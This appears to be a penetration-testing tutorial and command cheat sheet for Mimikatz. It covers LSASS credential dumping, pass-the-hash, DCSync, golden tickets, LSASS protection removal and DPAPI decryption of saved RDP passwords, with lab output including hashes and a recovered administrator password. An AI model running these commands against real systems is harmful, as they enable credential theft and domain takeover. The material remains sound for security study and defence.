Mimikatz is a common tool to extract credentials from Microsoft Windows systems, which can be downloaded here; https://github.com/gentilkiwi/mimikatz
A PowerShell port of Mimikatz is also available here: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
Mimikatz Commands
Privilege Escalation
Command | Description |
---|---|
privilege::debug | Enable debug privileges. |
token::elevate | Elevate current process token. |
token::revert | Revert token privileges. |
token::whoami | Display information about the current user’s token. |
Password Extraction and Manipulation
Command | Description |
---|---|
sekurlsa::logonpasswords | Extract credentials from memory. |
lsadump::sam | Extract the SAM database. |
sekurlsa::wdigest | Extract WDigest credentials. |
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM_hash> | Perform pass-the-hash attack. |
sekurlsa::ekeys | List kerberos keys. |
lsadump::dcsync /domain:<DomainFQDN> /all | Perform a DCSync attack against a domain controller. |
sekurlsa::minidump lsass.DMP | Extract passwords from a minidump file. |
Kerberos Attacks
Command | Description |
---|---|
kerberos::list | List Kerberos tickets in memory. |
sekurlsa::tickets /export | Export Kerberos tickets. |
sekurlsa::tickets /purge | Purge Kerberos tickets from memory. |
kerberos::ptt <ticket_file> | Pass-the-ticket: Import Kerberos ticket from a file. |
kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ticket:<ticket_file> | Create a Kerberos golden ticket. |
kerberos::tgt | Dump current TGT information. |
kerberos::ptc <target_SPN> | Pass-the-credential: Request service ticket based on current TGT for a given SPN. |
kerberos::list /export | Export Kerberos tickets to file. |
Crypto & Certificate Operations
Command | Description |
---|---|
crypto::capi | Patches the CryptoAPI to make keys exportable. |
crypto::certificates | List certificates in memory. |
crypto::keys | List keys in memory. |
crypto::certificates /export | Export certificates. |
DPAPI & Windows Credential Vault
Command | Description |
---|---|
dpapi::masterkey /in:<masterkey_file> | Load DPAPI master key from a file. |
dpapi::cache | List DPAPI credentials cache. |
dpapi::cred /in:C:\key\location /masterkey:<MASTERKEY> | Decrypt a DPAPI encrypted file using a masterkey |
vault::list | List Windows vault credentials. |
sekurlsa::dpapi | Dump DPAPI keys for all users. |
Miscellaneous
Command | Description |
---|---|
misc::memssp | Patches LSASS so credentials are logged to C:\Windows\System32\mimilsa.log. |
Usage Examples
One Line Commands
If you’re executing Mimikatz from a non-interactive command shell, parameters supplied need to be encapsulated in double quotes, as per the below example;
C:\Tools>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1648146 (00000000:00192612)
Session : Interactive from 5
User Name : alice
Domain : BORDERGATE
Logon Server : DC01
Logon Time : 29/04/2024 17:30:10
SID : S-1-5-21-1220112391-3624315575-3511410581-1104
msv :
[00000003] Primary
* Username : alice
* Domain : BORDERGATE
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 7392169935f1a74665da82b62773cff3
Removing PPL Protection from LSASS
Upload mimidriver.sys driver to the same directory as your running Mimikatz from, then execute the following commands to remote PPL protection from LSASS.
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
The driver can be removed with:
mimikatz # !processprotect /process:lsass.exe
mimikatz # !-
Extracting Windows Vault RDP Credentials
Mimikatz can be used to extract saved Credential Manager passwords, such as saved RDP credentials.
![](https://www.bordergate.co.uk/wp-content/uploads/2024/05/vault_creds.png)
First, we need to list the credentials available, which are stored in a users AppData folder;
dir /a C:\Users\alice\AppData\Local\Microsoft\Credentials\
Volume in drive C has no label.
Volume Serial Number is 2AD5-BF62
Directory of C:\Users\alice\AppData\Local\Microsoft\Credentials
01/05/2024 18:43 <DIR> .
01/05/2024 18:41 <DIR> ..
01/05/2024 18:43 396 AA1843CE085D8B96A03D81C3D6CD5F07
29/04/2024 18:29 11,052 DFBE70A7E5CC19A398EBF1B96859CE5D
2 File(s) 11,448 bytes
2 Dir(s) 50,326,667,264 bytes free
We can then used Mimikatz to find which master encryption key is associated with a credential:
mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {22df88d6-46f5-4560-9d07-b905b6399b34}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 6c9182a4f6dd09325d57ad0aba6d3b8b
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 532c59ee0aa855aa6149b85fcab9dd62
dwDataLen : 000000c8 - 200
pbData : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe
dwSignLen : 00000014 - 20
pbSign : 7d0232eee442038935c1ff4c2d36ae813052ed39
Mimikatz can then be used to decrypt the master encryption key:
mimikatz # dpapi::masterkey /in:C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-1220112391-3624315575-3511410581-1104\22df88d6-46f5-4560-9d07-b905b6399b34 /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {22df88d6-46f5-4560-9d07-b905b6399b34}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 874710a496905265bff3b8d7c32a9ce5
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 852645998d9f798f7f587da5e0168678f3b948796de93a32d8ec5b76e8da2a818e3d48e484a276cc85a08606cad8de5cf6eeda708f1c2b0ab39ae8b49164a35539bcc20fcb36b756ad9a739b429626f56a8ab41e1d2e3925686e4a918ac2a8e103df57406c41603c
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : e6cad989a10dfd8c3006f1c7189ff1c7
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 215aae5e4f871dd1bbff35da4d2327a18b3c2e6d5e1b3a66357a995e6f9601a5ec7d7dc7479ec71a0e6d9ed1ba880527688ac6e961a5b6dfee4fccea65f787f9df79dcfb241e22f7
[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {b357e77b-14ca-40b1-8bbb-4519ccd27f56}
pbSecret : ae90378cef835e995f1b0f7f6dff82914c2897e567ec0c93916b06418b383037d973700b34c36cb2ed82c774197f737b4738275616b0a26721aa836dd8720e166d2d709133a130417845adb36a0a988f40cca376e73ff2083660b2816bec030db585aa5bd90bdf9983e701642d9f2b91bbe5a79649c3014b62b094e4aeaaa87c905195d10c6eb70c074a79ccf1c76d02132fc32bbd818d969991c5e7e8b5347a743bc697d9f70296c438475ad7e8705220d545950a8eb2b43679e3c12b8f2b6932fc2b0d0786c9c4d3f0888b63336078751a77fd2064e2bf47b24ca118b266559dbd0eea136fb7b3c9b4aeba90e7c5f903f23efdfeee7253c18e5d2f55e3d96c
pbAccesscheck : a9bf58ff84d39b1342d054382143ddfc0d0da80baa7f90e8bc6c1fdda8cd728d4ae01e37697cf36ac54a2cdc9db8d87ec86ac4cd511e66471b1dcb50fd94e73cdcf30553b70881fe06f87ba802fda40beaa9d13c50a24a67
Auto SID from path seems to be: S-1-5-21-1220112391-3624315575-3511410581-1104
[backupkey] without DPAPI_SYSTEM:
key : 1bef6c3f1d68fed793f40adf81f40af5fad20c7b6a7a260c6b03e249d05dc823
sha1: 87b7a5d5fffc653128d09c0a65afe9470b7d2c07
[domainkey] with RPC
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
key : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
sha1: b535443c8c459fe08911f85779f1bbed0bf9bef6
Using the masterkey we just extracted, we can decrypt the RDP password.
mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07 /masterkey:14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {22df88d6-46f5-4560-9d07-b905b6399b34}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 6c9182a4f6dd09325d57ad0aba6d3b8b
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 532c59ee0aa855aa6149b85fcab9dd62
dwDataLen : 000000c8 - 200
pbData : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe
dwSignLen : 00000014 - 20
pbSign : 7d0232eee442038935c1ff4c2d36ae813052ed39
Decrypting Credential:
* volatile cache: GUID:{22df88d6-46f5-4560-9d07-b905b6399b34};KeyHash:b535443c8c459fe08911f85779f1bbed0bf9bef6;Key:available
* masterkey : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000c2 - 194
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 01/05/2024 14:43:56
unkFlagsOrSize : 00000018 - 24
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=TERMSRV/DC01
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : BORDERGATE\Administrator
CredentialBlob : Password1
Attributes : 0
Common Errors
If you receive the error message kuhl_m_sekurlsa_acquireLSA, ensure you are running the command in an Adminstrator command prompt, and that the privilege::debug command has been issued first;
mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1648146 (00000000:00192612)
Session : Interactive from 5
User Name : alice
Domain : BORDERGATE
Logon Server : DC01
Logon Time : 29/04/2024 18:00:10
SID : S-1-5-21-1220112391-3624315575-3511410581-1104
msv :
[00000003] Primary
* Username : alice
* Domain : BORDERGATE
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 7392169935f1a74665da82b62773cff3